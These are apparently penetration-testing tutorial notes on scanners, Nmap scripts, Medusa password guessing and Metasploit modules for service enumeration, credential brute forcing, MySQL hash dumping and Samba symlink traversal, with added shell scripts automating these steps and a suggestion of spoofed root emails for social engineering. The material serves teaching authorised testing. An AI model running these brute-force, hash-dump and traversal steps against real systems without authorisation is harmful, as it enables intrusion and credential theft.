Automated Tools

The top 10 vulnerability scanners

sectools.org

Nessus (commercial; originally open source, a free limited edition exists)

OpenVAS (open source)

Core Impact (commercial)

Nexpose (commercial)

GFI LanGuard (commercial)

QualysGuard (commercial)

MBSA (free, Microsoft; not open source)

Retina (commercial)

Secunia PSI (free; not open source)

Nipper (commercial)

Vulnerability exploitation tools

sectools.org

Metasploit (open source/commercial)

Core Impact (commercial)

sqlmap (open source)

Canvas (commercial)

Netsparker (commercial)

Nmap Scripts

/usr/share/nmap/scripts (default NSE script directory on Linux)

The -A flag runs the default script set (the same scripts as -sC) together with OS detection, version detection and traceroute; to run a specific script or category, use --script=<name|category> instead

nmap -A 10.0.3.125
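Running -A against every host is noisy and slow; a practitioner usually does a version scan first and then points the relevant NSE scripts at each open service. The following is an added example, not part of the original notes: it parses nmap's grepable output (-oG) and builds a targeted --script scan. The script names are real NSE scripts; the scan output is a constructed sample standing in for `nmap -sV -oG - 10.0.3.125`.

```shell
#!/bin/sh
# Added example (not from the original notes): choose NSE scripts per open service
# instead of the blunt "nmap -A".
# Constructed sample of nmap grepable output; on a real engagement replace it with:
#   nmap -sV -oG - 10.0.3.125 | open_services | build_scan 10.0.3.125 | sh
SAMPLE_GNMAP='# Nmap 7.94 scan initiated as: nmap -sV -oG - 10.0.3.125
Host: 10.0.3.125 ()  Status: Up
Host: 10.0.3.125 ()  Ports: 21/open/tcp//ftp//vsftpd 2.3.4/, 25/open/tcp//smtp//Postfix smtpd/, 445/open/tcp//netbios-ssn//Samba smbd 3.X/, 2049/open/tcp//nfs//2-4 (RPC #100003)/, 3306/open/tcp//mysql//MySQL 5.0.51a/, 5900/open/tcp//vnc//VNC (protocol 3.3)/  Ignored State: closed (994)
# Nmap done'

# open_services: read grepable output on stdin, print "port/service" per open port.
# The Ports field is "port/state/proto/owner/service/rpc/version/" entries joined by ", ".
open_services() {
    grep '^Host:.*Ports:' | sed 's/.*Ports: //; s/[[:space:]]*Ignored.*//' | tr ',' '\n' |
    awk -F/ '{ sub(/^ +/, "", $1) } $2 == "open" { print $1 "/" $5 }'
}

# scripts_for SERVICE: NSE scripts worth running for a given nmap service name.
# Only discovery/enumeration scripts; nothing here writes to the target.
scripts_for() {
    case "$1" in
        ftp)                       echo "ftp-anon,ftp-syst" ;;
        smtp)                      echo "smtp-commands,smtp-enum-users" ;;
        netbios-ssn|microsoft-ds)  echo "smb-enum-shares,smb-enum-users" ;;
        nfs)                       echo "nfs-showmount,nfs-ls" ;;
        mysql)                     echo "mysql-info,mysql-empty-password" ;;
        vnc)                       echo "vnc-info" ;;
        *)                         echo "" ;;
    esac
}

# build_scan TARGET: read "port/service" lines on stdin and print one nmap command
# that runs only the selected scripts on only the ports that need them.
build_scan() {
    target=$1
    ports=""
    scripts=""
    while IFS=/ read -r port svc; do
        s=$(scripts_for "$svc")
        [ -z "$s" ] && continue
        ports="${ports:+$ports,}$port"
        scripts="${scripts:+$scripts,}$s"
    done
    echo "nmap -sV -p $ports --script $scripts $target"
}
```

Services with no mapping (the `*` case) are simply skipped, so an unexpected port never silently triggers an unrelated script; extend the case table rather than falling back to `-A`.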

Default Login Scans

Frequent issue: the use of default or weak passwords on applications and services

There are multiple tools we can use: Medusa, Hydra, ...

#> medusa -h <targetIP> -u root -p password -e ns -O mysql.medusa.out -M mysql

(-e ns additionally tries an empty password and the username as password for each user; -O writes the results to a file; -M selects the service module)
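Reading Medusa's console output by eye does not scale once you run it against several hosts, so the hits should be pulled out of the -O file. The block below is an added example, not from the original notes: it wraps the Medusa command above and extracts the successful logins. Medusa itself is not executed here; the output file content is a constructed sample in Medusa's `ACCOUNT FOUND:` line format.

```shell
#!/bin/sh
# Added example (not from the original notes). Wraps the Medusa check from the notes
# and parses its -O output file for successful logins.

# medusa_mysql_default_check HOST: the command from the notes, one output file per host.
# "-e ns" also tries an empty password (n) and the username as password (s).
medusa_mysql_default_check() {
    host=$1
    medusa -h "$host" -u root -p password -e ns -O "mysql.$host.out" -M mysql
}

# Constructed sample of a Medusa -O file (same line format Medusa prints on the console).
SAMPLE_MEDUSA_OUT='ACCOUNT CHECK: [mysql] Host: 10.0.3.125 (1 of 1, 0 complete) User: root (1 of 2, 0 complete) Password:  (1 of 3 complete)
ACCOUNT CHECK: [mysql] Host: 10.0.3.125 (1 of 1, 0 complete) User: root (1 of 2, 0 complete) Password: root (2 of 3 complete)
ACCOUNT FOUND: [mysql] Host: 10.0.3.125 User: root Password: root [SUCCESS]
ACCOUNT CHECK: [mysql] Host: 10.0.3.125 (1 of 1, 0 complete) User: admin (2 of 2, 1 complete) Password:  (1 of 3 complete)
ACCOUNT FOUND: [mysql] Host: 10.0.3.125 User: admin Password:  [SUCCESS]'

# found_accounts: read Medusa output on stdin, print "module host user password" for
# every successful login. An empty password (the -e n case) is printed as "<empty>"
# so it is not lost in the whitespace.
found_accounts() {
    sed -n 's/^ACCOUNT FOUND: \[\([^]]*\)\] Host: \([^ ]*\) User: \([^ ]*\) Password: \(.*\) \[SUCCESS\]$/\1 \2 \3 \4/p' |
    awk '{ if (NF == 3) $4 = "<empty>"; print }'
}

# Typical use after the run:  found_accounts < mysql.10.0.3.125.out
```

Keep the raw -O file as evidence; the parsed list is what goes into the report and into the next step (trying the same credentials against other services on the host).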

OpenVAS

JBroFuzz

Fuzzing is a process where random or malformed data is passed to an application in the hope of triggering an anomaly (a crash, an error or unexpected behaviour)

Fuzzing can take quite a while to complete

We can use a fuzzer whenever we discover a place to insert user-supplied data in an application

Metasploit

FTP

use auxiliary/scanner/ftp/anonymous (checks whether anonymous login is allowed)

use auxiliary/scanner/ftp/ftp_login (brute-forces FTP credentials)

Simple Mail Transfer Protocol

SMTP can be used to identify usernames on a target system or within the organization (via the VRFY, EXPN and RCPT TO commands)

User enumeration via SMTP

use auxiliary/scanner/smtp/smtp_enum

show options

set RHOSTS 192.168.1.123

run

Once we have this information, we can attempt to find passwords for each user

or send spoofed e-mails that appear to come from the root user (social engineering)
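What smtp_enum does on the wire is one VRFY per candidate name, with the verdict decided by the reply code. The block below is an added example, not from the original notes, that does the same check by hand with nc and shows the one reply that is easy to misread: 252 means the server refuses to confirm anything, not that the user exists. Host, port and the candidate names are assumptions; the server replies used for checking are constructed.

```shell
#!/bin/sh
# Added example (not from the original notes): manual SMTP user enumeration via VRFY.

# classify_reply "<smtp reply line>": map the 3-digit reply code to a verdict.
classify_reply() {
    case "$1" in
        250*|251*)       echo "exists" ;;        # user known (251 = will forward)
        252*)            echo "unverifiable" ;;  # server will not confirm; VRFY tells you nothing
        550*|551*|553*)  echo "unknown" ;;       # no such user / mailbox
        500*|502*)       echo "disabled" ;;      # VRFY not implemented: fall back to RCPT TO
        *)               echo "other" ;;
    esac
}

# session_vrfy_reply: read one SMTP session transcript on stdin and print the reply to
# the VRFY. Keeps only final reply lines ("NNN " not "NNN-", so multi-line banners are
# skipped) and drops the 220 greeting and 221 goodbye.
session_vrfy_reply() {
    tr -d '\r' | grep '^[0-9][0-9][0-9] ' | grep -v '^22[01] ' | head -n 1
}

# vrfy_user HOST PORT NAME: one connection per name (nc is assumed to be installed),
# prints "name verdict".
vrfy_user() {
    host=$1
    port=$2
    name=$3
    reply=$(printf 'VRFY %s\r\nQUIT\r\n' "$name" | nc -w 5 "$host" "$port" | session_vrfy_reply)
    echo "$name $(classify_reply "$reply")"
}

# Typical use (host and names are assumptions):
#   for n in root msfadmin postfix nobody; do vrfy_user 192.168.1.123 25 "$n"; done

# Constructed transcript of one session, used to check session_vrfy_reply offline.
SAMPLE_SESSION='220-mail.example.test ESMTP Postfix
220 ready
250 2.1.5 root <root@mail.example.test>
221 2.0.0 Bye'
```

If every name comes back "unverifiable" or "disabled", stop sending VRFY and switch to RCPT TO after a MAIL FROM, which most servers still answer per-recipient; that is also the difference between a noisy and a quiet enumeration in the mail logs.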

Server Message Block

SMB user enumeration

use auxiliary/scanner/smb/smb_enumshares

Brute-force of the “msfadmin” password.

Creating a link to a remote file share (Samba symlink traversal).

use auxiliary/admin/smb/samba_symlink_traversal

show options

set SMBSHARE tmp

exploit

Logging onto the remote system’s / (root) directory through the new link in the share.

Network File Shares

We can scan for Network File System (NFS) exports

using the “nfsmount” module in Metasploit

use auxiliary/scanner/nfs/nfsmount

show options

set RHOSTS

run

MySQL

auxiliary/scanner/mysql/mysql_login module

brute-forces MySQL login credentials

grab the password hashes stored in MySQL (requires valid credentials)

use auxiliary/scanner/mysql/mysql_hashdump

show options

set RHOSTS

run

PostgreSQL

auxiliary/scanner/postgres/postgres_login module (brute-forces PostgreSQL credentials)

auxiliary/scanner/postgres/postgres_schemadump (dumps the database schema once credentials are known)

Metasploit also has modules for Oracle

VNC

use auxiliary/scanner/vnc/vnc_none_auth (finds VNC servers that accept connections without authentication; the module takes no credentials)

show options

set RHOSTS

run
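Typing the same use/set/run sequence for every module above is error-prone (the RHOST vs RHOSTS slips in these notes show how). The block below is an added example, not from the original notes: it writes the scanner modules used in the FTP, SMTP, SMB, NFS, MySQL, PostgreSQL and VNC sections into a Metasploit resource script and runs it non-interactively with `msfconsole -r`. Module and option names are Metasploit's; the target, thread count and output path are assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): one resource script for the scanner
# modules from these notes.

# gen_service_rc TARGET FILE: write the resource script to FILE and print its path.
# Scanner modules take RHOSTS (not RHOST); setg makes it global so every module sees it.
# The samba_symlink_traversal admin module from the notes is deliberately left out,
# since it modifies the target's share and is a per-engagement decision.
gen_service_rc() {
    target=$1
    out=$2
    {
        echo "setg RHOSTS $target"
        echo "setg THREADS 4"
        for m in \
            auxiliary/scanner/ftp/anonymous \
            auxiliary/scanner/smtp/smtp_enum \
            auxiliary/scanner/smb/smb_enumshares \
            auxiliary/scanner/nfs/nfsmount \
            auxiliary/scanner/mysql/mysql_login \
            auxiliary/scanner/mysql/mysql_hashdump \
            auxiliary/scanner/postgres/postgres_login \
            auxiliary/scanner/vnc/vnc_none_auth
        do
            echo "use $m"
            # credential-driven modules need an account; root is the same guess the
            # Medusa line in the notes makes (assumption, change per target)
            case "$m" in
                */mysql_login|*/mysql_hashdump) echo "set USERNAME root" ;;
            esac
            echo "run"
        done
        echo "exit"
    } > "$out"
    echo "$out"
}

# run_service_rc FILE: run the script quietly (no banner) and exit when it finishes.
run_service_rc() {
    msfconsole -q -r "$1"
}

# Typical use (target is an assumption):
#   run_service_rc "$(gen_service_rc 10.0.3.125 /tmp/services.rc)"
```

Add a `spool /tmp/services.log` line at the top of the script if you want the module output kept as evidence; and since the notes' closing advice applies here too, compare what these modules report with the Nmap and Medusa results rather than trusting a single run.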

Never trust a single tool; use more than one for each task and compare their results
